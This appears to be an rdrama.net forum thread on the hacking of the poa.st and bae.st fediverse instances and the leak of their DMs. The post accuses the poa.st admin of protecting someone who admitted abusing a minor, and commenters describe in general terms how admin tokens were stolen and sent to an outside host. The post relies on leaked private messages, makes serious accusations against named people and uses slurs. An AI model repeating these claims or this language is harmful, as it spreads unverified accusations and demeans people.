Reported by:
  • XY : Google: how to p-dophiles multiply?

Oopsie whoopsie, someone did a little fricky wucky and admited to protecting a known p-do on their fediverse instance, poa.st

Bottom Text

For context, one of my favorite people on the fediverse who I don't understand at all is bot. She's active on http://seal.cafe currently (hosted by friend of the site & cat enjoyer @kroner), and is constantly getting into fights with lots of people about random issues; I enjoy these even without context because I'm a fan of incendiary rhetoric and bot is a world class shit talker who also seems to feel strongly about the things she choses to argue about.

If you don't take my word for it, here's a snapshot of recent box posts

https://i.rdrama.net/images/16850802876566367.webp

You might have seen that http://poa.st and http://bae.st, two popular instances on the free speech zone of the fediverse got hacked recently. We had a small thread here that didn't get the attention it deserved but there's a lot of rightoid seethe going on. Reminder that http://rdrama.cc is still the best instance that has all the marseys and has never been hacked; shout out @nekobit. If you remember the http://chudbuds.lol hack/leak, you'll know that private messages sent on the fediverse/Activity Pub are not end-to-end encrypted, so naturally lots of alt-tech wannabe e-celebs got their DMs leaked from this. For further context, graf is the admin/owner of http://poa.st who has recently feuded with Null and Crunklord420, over some dumb shit (watch MATI from 3 weeks ago if you want some context); he also defederated http://rdrama.cc over a meme nose emoji that he called doxing his admin (his admin runs a lolicon posting instance and also had a falling out with graf, so the image isn't doxing anymore but http://rdrama.cc is still blocked because he's a b-word)

So here's the meat. Box has been posting about s*x pests that use http://poa.st for well over a year at this point. As with many posts of someone claiming someone else on the internet is a s*x-pest, I was initially credulous, until this leak came out in which graf goes to bat for a guy who he says admitted to raping a minor to him directly. You could potentially get away with just staying silent on this issue, in my eyes, especially if you're wearing the mask of a free speech extremist alt-tech nerd, but graf is not that. He blocked http://rdrama.cc initially from sending any information to his instance, and later blocked both sent and recieved information from our instance to his. He blocked http://kiwifarms.cc under the pretense that http://kf.cc allowed cp on its servers, despite the fact that the 3rd party instance he claimed was the source of this cp had the policy set against it on the http://kf.cc server as it did on http://poa.st. Null sperging on the graf question about a month ago here.

Onion link for anyone who wants to explore more because kiwi farms is powered by a cat on one of those big wheels where they can run if they feel like it

https://i.rdrama.net/images/16850802878141081.webp

I have done my journ*listic duty and asked bot about this revelation, the response was incredibly keyed

https://i.rdrama.net/images/16850802881319487.webp

TLDR: Graf is homosexual (bad kind). Bot @ http://seal.cafe is vindicated. I am always right about fediverse tyrants being r-slur autists. Crunklord420 keeps being based and Terrypilled.

@Aevann, IDK if this is enough of a rightoid exposΓ© to qualify for grant marseybux, but I love you

Someone remind me to pin award this in the morning so that people see this because I have to spend some marsey bux and also this is good drama. k thanks


https://i.rdrama.net/images/17092367509484937.webp https://i.rdrama.net/images/17093267613293715.webp https://i.rdrama.net/images/1711210096745272.webp

163
Jump in the discussion.

No email address required.

Everyone involved in this is turbo online and should close their laptops and move to a monastery ASAP

@nekobit is cool tho, keep up the terminal illness

Jump in the discussion.

No email address required.

thanks :hapyday:

i applied some apache mitigations but apparently there are other potential vulnerabilities.

I'm probably going to search for vulnerabilities with trial and error then report them to ensure nothing happens.

Jump in the discussion.

No email address required.

so how does the vuln work exactly? like user uploads poz.jz to your server then real user runs poz.js client side and it posts their dms to http://fedirelay.xyz or is it serverside?

Jump in the discussion.

No email address required.

it's a little :marseymanlet: sophisticated, don't think :marseybigbussyhunterlove: anyone has figured out what exactly ran the script (seems like reports were vulnerable when opened on the admin :marseymoplicker: panel but don't know if that was the one used to hack http://poa.st and http://bae.st)

what the hackers actually :marseyakshually: got was the user's token, once they got a token :marseybadgejewgold: from an admin :marseycarpflorist: they could access :marsey403: the admin :marseymoplicker: panel where :marseydrama: all dms are easily visible (then made a simple :marseysmug4: script to scrape them)

the tokens were encoded and sent to http://fedirelay.xyz in a very very fancy way that i barely understand and couldn't hope to explain

Jump in the discussion.

No email address required.

Link copied to clipboard
Action successful!
Error, please refresh the page and try again.